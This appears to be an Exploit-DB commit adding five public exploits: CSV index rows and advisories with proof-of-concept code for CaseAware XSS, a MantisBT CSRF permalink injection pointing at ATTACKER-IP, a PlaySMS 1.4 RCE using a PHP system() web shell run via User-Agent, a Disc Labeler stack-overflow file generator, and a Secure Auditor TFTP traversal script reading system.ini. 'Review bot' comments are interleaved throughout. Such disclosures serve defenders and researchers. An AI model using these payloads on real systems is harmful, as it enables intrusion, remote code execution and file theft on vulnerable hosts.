DB: 2017-05-22

5 new exploits

Sure Thing Disc Labeler 6.2.138.0 - Buffer Overflow (PoC)

Secure Auditor 3.0 - Directory Traversal
KMCIS CaseAware - Cross-Site Scripting
Mantis Bug Tracker 1.3.10/2.3.0 - Cross-Site Request Forgery
PlaySMs 1.4 - 'import.php' Remote Code Execution
Offensive Security 2017-05-22 05:01:18 +00:00
parent df07287e80
commit 6351914249
6 changed files with 401 additions and 0 deletions


@ -5503,6 +5503,7 @@ id,file,description,date,author,platform,type,port
42019,platforms/multiple/dos/42019.txt,"Adobe Flash - Out-of-Bounds Read in Getting TextField Width",2017-05-17,"Google Security Research",multiple,dos,0
42021,platforms/windows/dos/42021.txt,"Microsoft Windows - Running Object Table Register ROTFLAGS_ALLOWANYCLIENT Privilege Escalation",2017-05-17,"Google Security Research",windows,dos,0
42027,platforms/multiple/dos/42027.html,"Mozilla Firefox 50 < 55 - Stack Overflow Denial of Service",2017-05-17,"Geeknik Labs",multiple,dos,0
42040,platforms/windows/dos/42040.py,"Sure Thing Disc Labeler 6.2.138.0 - Buffer Overflow (PoC)",2017-05-19,"Chance Johnson",windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
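Review bot: the 42040 description in the new row, "Sure Thing Disc Labeler 6.2.138.0 - Buffer Overflow (PoC)", drops the "Stack" qualifier that the file's own title line uses ("Stack Buffer Overflow (PoC)"); aligning the CSV description with the file header keeps the entry searchable by the same terms. The row is also filed under type "dos" although the PoC header states that a return pointer is overwritten and EIP is controlled, so a maintainer may want to confirm "dos" is the intended classification.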
@ -15524,6 +15525,7 @@ id,file,description,date,author,platform,type,port
42025,platforms/php/remote/42025.rb,"BuilderEngine 3.5.0 - Arbitrary File Upload and Execution (Metasploit)",2017-05-17,Metasploit,php,remote,80
42026,platforms/xml/remote/42026.py,"Oracle PeopleSoft - XML External Entity to SYSTEM Remote Code Execution",2017-05-17,"Ambionics Security",xml,remote,0
42031,platforms/win_x86-64/remote/42031.py,"Microsoft Windows Windows 7/2008 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-05-17,sleepya,win_x86-64,remote,445
42041,platforms/windows/remote/42041.txt,"Secure Auditor 3.0 - Directory Traversal",2017-05-20,hyp3rlinx,windows,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
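Review bot: the new 42041 row records port 0, but the advisory it indexes is a TFTP directory traversal whose PoC sends to UDP port 69 (`PORT = 69`); neighbouring remote entries do record the service port (42025 lists 80, 42031 lists 445), so 69 would be consistent here.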
@ -37879,3 +37881,6 @@ id,file,description,date,author,platform,type,port
42037,platforms/java/webapps/42037.txt,"ManageEngine ServiceDesk Plus 9.0 - Authentication Bypass",2017-05-19,ByteM3,java,webapps,0
42038,platforms/php/webapps/42038.txt,"PlaySMS 1.4 - Remote Code Execution",2017-05-19,"Touhid M.Shaikh",php,webapps,80
42039,platforms/hardware/webapps/42039.txt,"D-Link DIR-600M Wireless N 150 - Authentication Bypass",2017-05-19,"Touhid M.Shaikh",hardware,webapps,0
42042,platforms/php/webapps/42042.txt,"KMCIS CaseAware - Cross-Site Scripting",2017-05-20,justpentest,php,webapps,0
42043,platforms/php/webapps/42043.txt,"Mantis Bug Tracker 1.3.10/2.3.0 - Cross-Site Request Forgery",2017-05-20,hyp3rlinx,php,webapps,0
42044,platforms/php/webapps/42044.txt,"PlaySMs 1.4 - 'import.php' Remote Code Execution",2017-05-21,"Touhid M.Shaikh",php,webapps,0
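Review bot: "PlaySMs 1.4" in the 42044 description looks like a typo for "PlaySMS 1.4", which is how the adjacent 42038 row (same product, same author) and the advisory's own title spell it. The 42044 row also lists port 0 where 42038 lists 80 for the same web application; using one value for both would keep the index consistent.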


platforms/php/webapps/42042.txt (executable file, 27 lines)

@ -0,0 +1,27 @@
# Exploit Title: CaseAware Cross Site Scripting Vulnerability
# Date: 20th May 2017
# Exploit Author: justpentest
# Vendor Homepage: https://caseaware.com/
# Version: All the versions
# Contact: transform2secure@gmail.com
# CVE : 2017-5631
Source: https://nvd.nist.gov/vuln/detail/CVE-2017-5631#vulnDescriptionTitle
1) Description:
An issue with respect to input sanitization was discovered in KMCIS
CaseAware. Reflected cross site scripting is present in the user parameter
(i.e., "usr") that is transmitted in the login.php query string. So
bascially username parameter is vulnerable to XSS.
2) Exploit:
https://caseaware.abc.com:4322/login.php?mid=0&usr=admin'><a
HREF="javascript:alert('OPENBUGBOUNTY')">Click_ME<'
----------------------------------------------------------------------------------------
3) References:
https://www.openbugbounty.org/incidents/228262/
https://nvd.nist.gov/vuln/detail/CVE-2017-5631#vulnDescriptionTitle
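Review bot: the header line `# CVE : 2017-5631` omits the "CVE-" prefix that the NVD reference URL on the next line uses (CVE-2017-5631); writing the identifier in full keeps it consistent and greppable. "# Version: All the versions" also gives readers no way to tell whether a fixed release exists, and the NVD URL appears twice (the Source line and the References section), so one of the copies could go.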

platforms/php/webapps/42043.txt (executable file, 109 lines)

@ -0,0 +1,109 @@
[+] Credits: John Page a.k.a hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-CSRF-PERMALINK-INJECTION.txt
[+] ISR: ApparitionSec
Vendor:
================
www.mantisbt.org
Product:
=========
Mantis Bug Tracker
1.3.10 / v2.3.0
MantisBT is a popular free web-based bug tracking system. It is written in PHP works with MySQL, MS SQL, and PostgreSQL databases.
Vulnerability Type:
========================
CSRF Permalink Injection
CVE Reference:
==============
CVE-2017-7620
Security Issue:
================
Remote attackers can inject arbitrary permalinks into the mantisbt Web Interface if an authenticated user visits a malicious webpage.
Vuln code in "string_api.php" PHP file, under mantis/core/ did not account for supplied backslashes.
Line: 270
# Check for URL's pointing to other domains
if( 0 == $t_type || empty( $t_matches['script'] ) ||
3 == $t_type && preg_match( '@(?:[^:]*)?:/*@', $t_url ) > 0 ) {
return ( $p_return_absolute ? $t_path . '/' : '' ) . 'index.php';
}
# Start extracting regex matches
$t_script = $t_matches['script'];
$t_script_path = $t_matches['path'];
Exploit/POC:
=============
<form action="http://VICTIM-IP/mantisbt-2.3.0/permalink_page.php?url=\/ATTACKER-IP" method="POST">
<script>document.forms[0].submit()</script>
</form>
OR
<form action="http://VICTIM-IP/permalink_page.php?url=\/ATTACKER-IP%2Fmantisbt-2.3.0%2Fsearch.php%3Fproject_id%3D1%26sticky%3Don%26sort%3Dlast_updated%26dir%3DDESC%26hide_status%3D90%26match_type%3D0" method="POST">
<script>document.forms[0].submit()</script>
</form>
Network Access:
===============
Remote
Severity:
=========
Medium
Disclosure Timeline:
=============================
Vendor Notification: April 9, 2017
Vendor Release Fix: May 15, 2017
Vendor Disclosed: May 20, 2017
May 20, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
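Review bot: the advisory quotes the vulnerable check in string_api.php at line 270 and records a vendor fix released May 15, 2017, but never says which MantisBT release contains that fix or shows the corrected check, so readers cannot tell whether 1.3.10 / 2.3.0 are the last affected or the first fixed versions; naming the fixed release would resolve that. Minor: the timeline lists "Vendor Disclosed: May 20, 2017" and "May 20, 2017 : Public Disclosure" as separate entries for the same event, and the version line mixes "1.3.10" with "v2.3.0".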

platforms/php/webapps/42044.txt (executable file, 128 lines)

@ -0,0 +1,128 @@
# Exploit Title: PlaySMS 1.4 Remote Code Execution using Phonebook import Function in import.php
# Date: 21-05-2017
# Software Link: https://playsms.org/download/
# Version: 1.4
# Exploit Author: Touhid M.Shaikh
# Contact: http://twitter.com/touhidshaikh22
# Website: http://touhidshaikh.com/
# Category: webapps
1. Description
Code Execution using import.php
We know import.php accept file and just read content
not stored in server. But when we stored payload in our backdoor.csv
and upload to phonebook. Its execute our payload and show on next page in field (in NAME,MOBILE,Email,Group COde,Tags) accordingly .
In My case i stored my vulnerable code in my backdoor.csv files's Name field .
But There is one problem in execution. Its only execute in built function and variable which is used in application.
That why the server not execute our payload directly. Now i Use "<?php $a=$_SERVER['HTTP_USER_AGENT']; system($a); ?>" in name field and change our user agent to any command which u want to execute command. Bcz it not execute <?php system("id")?> directly .
Example of my backdoor.csv file content
----------------------MY FILE CONTENT------------------------------------
Name Mobile Email Group code Tags
<?php $t=$_SERVER['HTTP_USER_AGENT']; system($t); ?> 22
--------------------MY FILE CONTENT END HERE-------------------------------
For More Details : www.touhidshaikh.com/blog/
For Video Demo : https://www.youtube.com/watch?v=KIB9sKQdEwE
2. Proof of Concept
Login as regular user (created user using index.php?app=main&inc=core_auth&route=register):
Go to :
http://127.0.0.1/playsms/index.php?app=main&inc=feature_phonebook&route=import&op=list
And Upload my malicious File.(backdoor.csv)
and change our User agent.
This is Form For Upload Phonebook.
----------------------Form for upload CSV file ----------------------
<form action=\"index.php?app=main&inc=feature_phonebook&route=import&op=import\" enctype=\"multipart/form-data\" method=POST>
" . _CSRF_FORM_ . "
<p>" . _('Please select CSV file for phonebook entries') . "</p>
<p><input type=\"file\" name=\"fnpb\"></p>
<p class=text-info>" . _('CSV file format') . " : " . _('Name') . ", " . _('Mobile') . ", " . _('Email') . ", " . _('Group code') . ", " . _('Tags') . "</p>
<p><input type=\"submit\" value=\"" . _('Import') . "\" class=\"button\"></p>
</form>
------------------------------Form ends ---------------------------
-------------Read Content and Display Content-----------------------
case "import":
$fnpb = $_FILES['fnpb'];
$fnpb_tmpname = $_FILES['fnpb']['tmp_name'];
$content = "
<h2>" . _('Phonebook') . "</h2>
<h3>" . _('Import confirmation') . "</h3>
<div class=table-responsive>
<table class=playsms-table-list>
<thead><tr>
<th width=\"5%\">*</th>
<th width=\"20%\">" . _('Name') . "</th>
<th width=\"20%\">" . _('Mobile') . "</th>
<th width=\"25%\">" . _('Email') . "</th>
<th width=\"15%\">" . _('Group code') . "</th>
<th width=\"15%\">" . _('Tags') . "</th>
</tr></thead><tbody>";
if (file_exists($fnpb_tmpname)) {
$session_import = 'phonebook_' . _PID_;
unset($_SESSION['tmp'][$session_import]);
ini_set('auto_detect_line_endings', TRUE);
if (($fp = fopen($fnpb_tmpname, "r")) !== FALSE) {
$i = 0;
while ($c_contact = fgetcsv($fp, 1000, ',', '"', '\\')) {
if ($i > $phonebook_row_limit) {
break;
}
if ($i > 0) {
$contacts[$i] = $c_contact;
}
$i++;
}
$i = 0;
foreach ($contacts as $contact) {
$c_gid = phonebook_groupcode2id($uid, $contact[3]);
if (!$c_gid) {
$contact[3] = '';
}
$contact[1] = sendsms_getvalidnumber($contact[1]);
$contact[4] = phonebook_tags_clean($contact[4]);
if ($contact[0] && $contact[1]) {
$i++;
$content .= "
<tr>
<td>$i.</td>
<td>$contact[0]</td>
<td>$contact[1]</td>
<td>$contact[2]</td>
<td>$contact[3]</td>
<td>$contact[4]</td>
</tr>";
$k = $i - 1;
$_SESSION['tmp'][$session_import][$k] = $contact;
}
}
------------------------------code ends ---------------------------
Bingoo.....
*------------------My Friends---------------------------*
|Pratik K.Tejani, Rehman, Taushif,Charles Babbage |
*---------------------------------------------------*
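Review bot: the quoted PlaySMS excerpt stops mid-block after `$_SESSION['tmp'][$session_import][$k] = $contact;` (the `case "import":` block, the `foreach` and the `if` are never closed), and what it does show is `$contact[0]` being interpolated into the `$content` HTML string, which is output rather than evaluation; the excerpt therefore does not include the sink that runs PHP from the Name field, so the root cause the title claims is not demonstrated by the code shown. Pointing at wherever `$content` is later evaluated, if that is the sink, would make the advisory verifiable. The title should also state that the issue is reachable only by an authenticated user, since the PoC starts by registering an account via `index.php?app=main&inc=core_auth&route=register`.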

platforms/windows/dos/42040.py (executable file, 33 lines)

@ -0,0 +1,33 @@
# Exploit Title: Sure Thing Disc Labeler - Stack Buffer Overflow (PoC)
# Date: 5-19-17
# Exploit Author: Chance Johnson (albatross@loftwing.net)
# Vendor Homepage: http://www.surething.com/
# Software Link: http://www.surething.com/disclabeler
# Version: 6.2.138.0
# Tested on: Windows 7 x64 / Windows 10
#
# Usage:
# Open the project template generated by this script.
# If a readable address is placed in AVread, no exception will be thrown
# and a return pointer will be overwritten giving control over EIP when
# the function returns.
header = '\x4D\x56\x00\xFF\x0C\x00\x12\x00\x32\x41\x61\x33\x08\x00\x5E\x00'
header += '\x61\x35\x41\x61\x36\x41\x61\x37\x41\x61\x38\x41\x61\x39\x41\x62'
header += '\x30\x41\x62\x31\x41\x62\x32\x41\x62\x33\x41\x62\x34\x41\x62\x35'
header += '\x41\x62\x36\x41\x78\x37\x41\x62\x38\x41\x62\x39\x41\x63\x30\x41'
header += '\x0C\x00\x41\x63\x78\x1F\x00\x00\x41\x63\x34\x41\x63\x35\x41\x63'
junk1 = 'D'*10968
EIP = 'A'*4 # Direct RET overwrite
junk2 = 'D'*24
AVread = 'B'*4 # address of any readable memory
junk3 = 'D'*105693
buf = header + junk1 + EIP + junk2 + AVread + junk3
print "[+] Creating file with %d bytes..." % len(buf)
f=open("exp.std",'wb')
f.write(buf)
f.close()
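Review bot: the script is Python 2 only: `print "[+] Creating file with %d bytes..." % len(buf)` is a print statement, and `header`/`junk1` are `str` literals written to a file opened in `'wb'` mode, both of which fail on Python 3; `print(...)` and `b'...'` literals, plus `with open("exp.std", "wb") as f:` in place of the manual `close()`, would make it run on either interpreter. The offsets 10968, 24 and 105693 and the fixed header bytes carry no comment saying which region of the .std project file each corresponds to, so a one-line comment per region would let readers check the PoC against the stated version 6.2.138.0.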


@ -0,0 +1,99 @@
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SECURE-AUDITOR-v3.0-DIRECTORY-TRAVERSAL.txt
[+] ISR: ApparitionSec
Vendor:
====================
www.secure-bytes.com
Product:
=====================
Secure Auditor - v3.0
Secure Auditor suite is a unified digital risk management solution for conducting automated audits on Windows, Oracle and SQL databases
and Cisco devices.
Vulnerability Type:
===================
Directory Traversal
CVE Reference:
==============
CVE-2017-9024
Security Issue:
================
Secure Bytes Cisco Configuration Manager, as bundled in Secure Bytes Secure Cisco Auditor (SCA) 3.0, has a
Directory Traversal issue in its TFTP Server, allowing attackers to read arbitrary files via ../ sequences in a pathname.
Exploit/POC:
=============
import sys,socket
print 'Secure Auditor v3.0 / Cisco Config Manager'
print 'TFTP Directory Traversal Exploit'
print 'Read ../../../../Windows/system.ini POC'
print 'hyp3rlinx'
HOST = raw_input("[IP]> ")
FILE = '../../../../Windows/system.ini'
PORT = 69
PAYLOAD = "\x00\x01" #TFTP Read
PAYLOAD += FILE+"\x00" #Read system.ini using directory traversal
PAYLOAD += "netascii\x00" #TFTP Type
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(PAYLOAD, (HOST, PORT))
out = s.recv(1024)
s.close()
print "Victim Data located on : %s " %(HOST)
print out.strip()
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
==================================
Vendor Notification: May 10, 2017
No replies
May 20, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
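Review bot: `out = s.recv(1024)` in the PoC has no timeout, so if the target does not answer on UDP 69 the script blocks forever; `s.settimeout(5)` before the `sendto` and a `socket.timeout` handler would let it fail cleanly. The script also reads only the first datagram and never continues the TFTP transfer, so for files larger than one data block only the first block is printed; stating that limitation in the advisory would stop readers mistaking truncated output for a short file. Like 42040.py in this commit, the `print` statements and `raw_input` make it Python 2 only.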